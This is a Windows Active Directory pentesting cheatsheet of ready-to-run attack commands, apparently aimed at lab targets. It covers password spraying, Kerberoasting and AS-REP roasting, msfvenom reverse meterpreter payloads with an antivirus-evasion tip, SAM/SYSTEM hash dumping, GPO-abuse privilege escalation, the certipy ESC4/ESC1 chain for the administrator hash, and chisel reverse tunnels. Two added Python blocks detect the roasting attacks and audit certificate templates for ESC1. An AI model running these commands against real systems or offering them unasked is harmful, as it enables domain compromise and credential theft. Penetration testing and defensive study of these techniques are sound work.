Acfirth

Windows Pentesting Cheatsheet

General Reconnaissance

nmap -sn <IP/{subnet_mask}>
[Scans an IP range for alive hosts]

    Example:
    nmap -sn 10.0.0.0/24
    [Scans all IPs from 10.0.0.1 - 10.0.0.254]
nmap --min-rate 4500 --max-rtt-timeout 1500ms <IP|Hostname> -p-
[Scans all ports on a given target (You can remove -p- to only scan the top 1000 ports)]
nmap --min-rate 4500 --max-rtt-timeout 1500ms <IP|Hostname> -p- -sV
[Scans all ports and then attempts to find the services running on open ports]

The -Pn flag (skip host discovery) may be required when scanning Windows hosts that do not respond to pings.

FTP and SMB

FTP Anonymous Login

FTP (File Transfer Protocol) is used for allowing authorised users to transfer files between locations without the need for physical media. However, most FTP servers allow for the option of “anonymous login”. This means that a user named “anonymous” can access files on the FTP server without the need for a password.

This can be done using the command: ftp anonymous@<IP|Hostname>

Anonymous login on FTP servers can be detected using NMAP:
nmap -p <FTP_Port_usually_21> --script ftp-anon <IP|Hostname>

SMB Enumeration

SMB is commonly used for network file shares, allowing users to access files within a named share across a network. Shares can also be publicly accessible over the internet if the server is configured that way.

Sometimes, if misconfigured, an SMB server may allow “null logins” (null sessions), where a client is able to authenticate without a username or password. This is a vulnerability because it may allow an attacker to see which file shares are available, and possibly read from or write to them.

NMAP can be used to check for null logins and enumerate file shares on an SMB server:
nmap -p <SMB_Port_usually_445/139> --script smb-os-discovery,smb-enum-shares <IP|Hostname>

SMBMap

SMBMap is a tool for enumerating Samba (SMB) shares. It has a very simple syntax.

smbmap -H <IP|Hostname>
[Attempts to enumerate shares on a given host]

smbmap -H <IP|Hostname> -u <username> -p <password|NTLM_Hash>
[Attempts to enumerate shares on a given host using a username and password for authentication]

SMBClient

SMBClient is an FTP-like client used for accessing SMB shares.

Basic Usage:

smbclient //<IP|Hostname>/<share>
[Attempts to authenticate without username or password]

smbclient //<IP|Hostname>/<share> -U <username>
[Attempts to authenticate with just a username]

smbclient //<IP|Hostname>/<share> -U <username> --password=<password>
[Attempts to authenticate with a given username and password]

NXC SMB Share Listing

nxc smb -u '<USERNAME>' -p '<PASSWORD>' --shares <DOMAIN/IP>

NXC SMB RID Bruteforcing

This only works if the default share IPC$ has READ access. It is used to enumerate valid domain accounts.

nxc smb -u '<USERNAME>' -p '<PASSWORD>' --rid-brute <DOMAIN/IP>

You can strip the output to only get SidTypeUser accounts.

nxc smb -u '<USERNAME>' -p '<PASSWORD>' --rid-brute <DOMAIN/IP> | grep SidTypeUser | cut -d: -f2 | cut -d \\ -f2 | cut -d' ' -f1 > users.lst

NXC Password Spraying

nxc smb -u ./users.lst -p '<PASSWORD>' --continue-on-success <DOMAIN/IP>

NXC Get User Account Information

nxc smb -u '<USERNAME>' -p '<PASSWORD>' --users <DOMAIN/IP>

Enumerate Potential Usernames with Kerbrute:

kerbrute userenum --dc <DOMAIN_CONTROLLER_IP> -d <DOMAIN> <USERNAME_LIST> | grep "VALID USERNAME" | awk '{print $NF}'
[Prints the format: <USERNAME>@<domain>]

kerbrute userenum --dc <DOMAIN_CONTROLLER_IP> -d <DOMAIN> <USERNAME_LIST> | grep "VALID USERNAME" | awk '{print $NF}' | cut -d@ -f1
[Prints just the username: <USERNAME>]

Password Spray (One Password Multiple Users) with Kerbrute:

kerbrute passwordspray --dc <DC-IP> -d <DOMAIN> <USERNAME_LIST> '<PASSWORD>'

Bloodhound Data Collection

This is useful when you have valid domain credentials but no access to a machine inside the domain:

bloodhound-python -c All -u '<USERNAME>' -p '<PASSWORD>' -d <DOMAIN>

You may have to provide a name server:

bloodhound-python -c All -u '<USERNAME>' -p '<PASSWORD>' -d <DOMAIN> -ns <DC-IP>

Kerberoasting

Impacket-GetNPUsers

This returns an AS-REP hash for each account in the list that does not require Kerberos pre-authentication (AS-REP roasting):

impacket-GetNPUsers -dc-ip <DC-IP> -usersfile <USERNAME_LIST> <DOMAIN>/

Impacket-GetUserSPNs

This is generally used against service accounts that have an SPN set, to request service tickets whose encrypted part may be crackable offline. The -request flag is what actually requests and prints the tickets:

impacket-GetUserSPNs -dc-ip <DC-IP> -request <domain>/<username>:<password>

If you have no password but do have the NTLM hash, you can pass the hash instead. Impacket expects the LM:NT format; the LM half can be left empty (-hashes :<NT_HASH>).

impacket-GetUserSPNs -dc-ip <DC-IP> -request -hashes <LM_HASH>:<NT_HASH> <domain>/<username>

If you have used Impacket’s GetNPUsers and obtained a hash for an account that does not require pre-authentication but you cannot crack it, you can still request service tickets through that account with the -no-preauth option (the tickets are requested via the AS rather than the TGS):

impacket-GetUserSPNs -no-preauth <NOPREAUTH_USER> -usersfile <USERNAME_LIST> -dc-host <DC_HOSTNAME> <domain>/
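
From the defender's side, the two Impacket requests above are visible in domain controller logging: Kerberoasting shows as 4769 service-ticket requests with RC4 (0x17) for non-computer accounts, and GetNPUsers shows as 4768 TGT requests with pre-authentication type 0. This Python triage routine is an added example, not part of the original cheatsheet; the sample events and field names are constructed.

```python
# Constructed sample of DC security events (not real telemetry; the field names are this
# example's own). 4768 = TGT request, 4769 = service ticket request.
SAMPLE_EVENTS = [
    # normal AES service ticket for a computer account
    {"id": 4769, "account": "alice@HACKME.LOCAL", "service": "WS01$", "etype": "0x12", "src": "10.0.0.20"},
    # RC4 tickets for user accounts that carry an SPN: the Kerberoast signature
    {"id": 4769, "account": "alice@HACKME.LOCAL", "service": "svc_sql", "etype": "0x17", "src": "10.0.0.20"},
    {"id": 4769, "account": "alice@HACKME.LOCAL", "service": "svc_web", "etype": "0x17", "src": "10.0.0.20"},
    # krbtgt tickets are requested during every logon; not a roasting target on their own
    {"id": 4769, "account": "alice@HACKME.LOCAL", "service": "krbtgt", "etype": "0x17", "src": "10.0.0.20"},
    # normal TGT request with pre-authentication (type 2 = encrypted timestamp)
    {"id": 4768, "account": "bob", "preauth": "2", "etype": "0x12", "src": "10.0.0.21"},
    # TGT issued with pre-authentication type 0 and RC4: the AS-REP roast signature
    {"id": 4768, "account": "svc_legacy", "preauth": "0", "etype": "0x17", "src": "10.0.0.20"},
]

RC4_HMAC = "0x17"

def is_kerberoast(e):
    """4769 with an RC4 ticket for a non-computer, non-krbtgt service account."""
    return (e["id"] == 4769 and e["etype"] == RC4_HMAC
            and not e["service"].endswith("$") and e["service"].lower() != "krbtgt")

def is_asrep_roast(e):
    """4768 where no pre-authentication was performed and the ticket is RC4."""
    return e["id"] == 4768 and e["preauth"] == "0" and e["etype"] == RC4_HMAC

def triage(events):
    """Group suspicious events per source IP: {src: {"kerberoast": [...], "asrep": [...]}}."""
    findings = {}
    for e in events:
        if is_kerberoast(e):
            findings.setdefault(e["src"], {"kerberoast": [], "asrep": []})["kerberoast"].append(e["service"])
        elif is_asrep_roast(e):
            findings.setdefault(e["src"], {"kerberoast": [], "asrep": []})["asrep"].append(e["account"])
    return findings

if __name__ == "__main__":
    for src, f in triage(SAMPLE_EVENTS).items():
        print(f"{src}: RC4 service tickets for {f['kerberoast']}, no-preauth TGTs for {f['asrep']}")
```

Where AES is enforced for service accounts, any 0x17 ticket stands out; in mixed environments, alert on one source requesting RC4 tickets for several distinct service accounts rather than on single events.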

Read GMSA Password:

bloodyAD --host "<DC-IP>" -d "<DOMAIN>" -u "<USERNAME>" -p "<PASSWORD>" get object <GMSA_ACCOUNT> --attr msDS-ManagedPassword

Bruteforcing

Service Bruteforce:

hydra -l '<TARGET_USERNAME>' -P /usr/share/wordlists/rockyou.txt <SERVICE>://<TARGET_IP>
hydra -L '<USERNAME_LIST>' -P /usr/share/wordlists/rockyou.txt <SERVICE>://<TARGET_IP>

SUPPORTED SERVICES (hydra module names, written in lowercase in the URL form above; hydra supports many more): ssh, ftp, rdp, vnc, smb, pop3, telnet

Generating Payloads for Windows Hosts

Msfvenom

You can use msfvenom to quickly generate a multitude of payload types, including meterpreter shells, which let you use Metasploit post-exploitation modules on a compromised machine.

msfvenom --list all
[Used to list the available modules (payload, encoders, etc.)]

msfvenom -p <payload_type> LHOST=<Listener_IP|Hostname|Domain> LPORT=<Listener_Port> -f <output_format> -o <output_name>
[General msfvenom command template]

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Listener_IP> LPORT=<Listener_Port> -f exe -o payload.exe
[Generates a meterpreter shell for Windows (64-bit) in an EXE format]

You can use the '-e' argument to supply an encoder type and encode the payload; this can help avoid detection by anti-virus (AV) software.

If you are using a meterpreter payload, you should set up a listener in msfconsole before deploying the payload.

Commands to run:

- msfconsole
- use exploit/multi/handler
- set PAYLOAD <payload_type_used>
- set LHOST <Listener_IP_used>
- set LPORT <Listener_Port_used>
- run

If the listener fails to start correctly, check that you are listening on the correct IP (LHOST).
Another common cause is trying to listen on a port below 1024: these are “privileged ports”, so you need to run msfconsole with administrative permissions (using sudo).

Privilege Escalation

Check User Privileges

whoami /priv

Backup SAM and SYSTEM Files (SeBackupPrivilege REQUIRED):

Option 1

reg save hklm\system C:\temp\system
reg save hklm\sam C:\temp\sam

Download the files and extract the hashes.

Option 2

Create a file with the content:

set context persistent nowriters
add volume c: alias test
create
expose %test% z:

Upload this file to the temp directory on the target. Run the command:

diskshadow /s <filename>

Now use robocopy to copy the files to the temp directory:

robocopy /b Z:\Windows\System32\Config C:\temp SAM
robocopy /b Z:\Windows\System32\Config C:\temp SYSTEM

Download the files to your local machine to extract the hashes.

Dump User Hashes From SAM and SYSTEM:
impacket-secretsdump -system SYSTEM -sam SAM LOCAL

“Group Policy Creator Owners” Group Abuse

The Group Policy Creator Owners group lets its members create new GPOs; however, members can only edit or delete GPOs that they themselves created. This privilege can be abused by creating a new GPO that adds a target user to the local Administrators group, and then forcing a GPO update.

1 - Find out if the user is in the group

whoami /all

[SNIPPED]
GROUP INFORMATION
-----------------

Group Name                                   Type             SID                                            Attributes
============================================ ================ ============================================== ===============================================================
Everyone                                     Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users              Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access   Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                         Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users             Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization               Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
hackme\Desktop Admins                         Group            S-1-5-21-2386970044-1145388522-2932701813-1121 Mandatory group, Enabled by default, Enabled group
hackme\Group Policy Creator Owners            Group            S-1-5-21-2386970044-1145388522-2932701813-520  Mandatory group, Enabled by default, Enabled group
[SNIPPED]

2 - Drop SharpGPOAbuse.exe on the target machine, or use Invoke-SharpGPOAbuse

3 - Run the commands:

New-GPO -Name "totallyLegitGPO"
New-GPLink -Name "totallyLegitGPO" -Target "OU=Domain Controllers,DC=hackme,DC=local"
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount <TARGET_USER> --GPOName totallyLegitGPO

4 - Force a GPO update

gpupdate /force

After performing these steps, run whoami /groups to check if the target user has been added to the local administrators group. It may take a few minutes to work.

Get Passwords From PS .xml Creds File:

$Credential = Import-Clixml -Path "<xml_file>"
$Credential.GetNetworkCredential().password

Get Individual AD Computer IP:

$ComputerName = "<MACHINE>"
(Get-ADComputer $ComputerName -Properties IPv4Address).IPv4Address

List all AD Computers and IPs:

Get-ADComputer -Filter * -Properties IPv4Address | select name,IPV4Address

Enumerate System Patches:

wmic qfe get Caption,Description,HotFixID,InstalledOn

ADCS

ADCS Certificate Exploits:

ESC4:

Collect vulnerable certificate templates

certipy find -u "<OWNED_USER>" -p "<PASSWORD>" -dc-ip "<DC_IP>" -vulnerable -enabled -stdout

Make the template vulnerable to ESC1 (-save-old backs up the current configuration so it can be restored afterwards)

certipy template -username <OWNED_USER@DOMAIN> -password <PASSWORD> -target-ip <DC_IP> -template '<TEMPLATE_NAME>' -save-old

Exploit ESC1

certipy req -username <OWNED_USER@DOMAIN> -password <PASSWORD> -target-ip <DC_IP> -ca <CERTIFICATE_CA> -template '<TEMPLATE_NAME>' -upn administrator@<DOMAIN>

Restore config

certipy template -username <OWNED_USER@DOMAIN> -password <PASSWORD> -target-ip <DC_IP> -template '<TEMPLATE_NAME>' -configuration <BACKED_UP_CERT>.json

Get hash for administrator

certipy auth -pfx administrator.pfx
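
The ESC4 chain above works by rewriting a template until it satisfies the ESC1 conditions, and the restore step is only complete when the template no longer does. The following Python encodes those conditions as an audit check; it is an added example, not part of the cheatsheet or of Certipy, and the template snapshots and the `low_priv_can_enroll` field are constructed assumptions standing in for values pulled from AD.

```python
# Flag bits and EKU OIDs from the AD certificate template schema (msPKI-* attributes).
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # in msPKI-Enrollment-Flag: manager approval
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

def esc1_check(t):
    """Evaluate the ESC1 conditions on one template dict.
    Returns (all_conditions_met, [names of the conditions that are met])."""
    conditions = {
        "enrollee supplies subject": bool(t["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "no manager approval": not (t["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS),
        "no authorized signatures": t["ra_signatures"] == 0,
        # an empty EKU set means "no EKU restriction", which also allows authentication
        "authentication EKU": not t["ekus"] or bool(t["ekus"] & AUTH_EKUS),
        "low-privileged enrollment": t["low_priv_can_enroll"],
    }
    return all(conditions.values()), [name for name, met in conditions.items() if met]

# Constructed template snapshots (attribute values are this example's own, not from a real
# forest); `low_priv_can_enroll` stands in for the enrollment-ACL check.
TEMPLATES = {
    "User": {"name_flag": 0x82000000, "enrollment_flag": 0x29, "ra_signatures": 0,
             "ekus": {"1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"}, "low_priv_can_enroll": True},
    # subject supplied by the enrollee, but server-auth only: no logon is possible with it
    "WebServer-Legacy": {"name_flag": 0x1, "enrollment_flag": 0x0, "ra_signatures": 0,
             "ekus": {"1.3.6.1.5.5.7.3.1"}, "low_priv_can_enroll": True},
    "VPN-Users": {"name_flag": 0x1, "enrollment_flag": 0x0, "ra_signatures": 0,
             "ekus": {"1.3.6.1.5.5.7.3.2"}, "low_priv_can_enroll": True},
    # identical to VPN-Users except that CA manager approval is required
    "VPN-Approved": {"name_flag": 0x1, "enrollment_flag": 0x2, "ra_signatures": 0,
             "ekus": {"1.3.6.1.5.5.7.3.2"}, "low_priv_can_enroll": True},
}

def find_esc1(templates):
    """Names of templates that meet every ESC1 condition, sorted."""
    return sorted(name for name, t in templates.items() if esc1_check(t)[0])

if __name__ == "__main__":
    for name, t in TEMPLATES.items():
        met, why = esc1_check(t)
        print(f"{name:17} ESC1={met}  ({', '.join(why)})")
```

Running the check against the configuration saved by -save-old and again after the restore step gives a concrete pass/fail for whether the template is back in its original state.
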

Windows Priv-Esc with Meterpreter Shell:

1 - In the current meterpreter session, run “background” to background it.
2 - Get the session number with “sessions”.
3 - Load the suggester with “use multi/recon/local_exploit_suggester”.
4 - Point it at the session with “set SESSION <session_number>”, then “run”.
5 - Choose an exploit the suggester reports the host as vulnerable to, copy its path and load it with “use <exploit_path>”.
6 - Review the options with “show options” and set them with “set <OPTION_NAME> <value>”.
7 - Run the exploit with “exploit”.

Tunneling

Chisel Tunneling:

Attacker:       [./chisel<.exe> server -p <port to listen on> --reverse]
Target:         [./chisel.exe client <listener_ip>:<listener_port> R:<port_to_open_on_attacker_machine>:<target_ip>:<target_port>]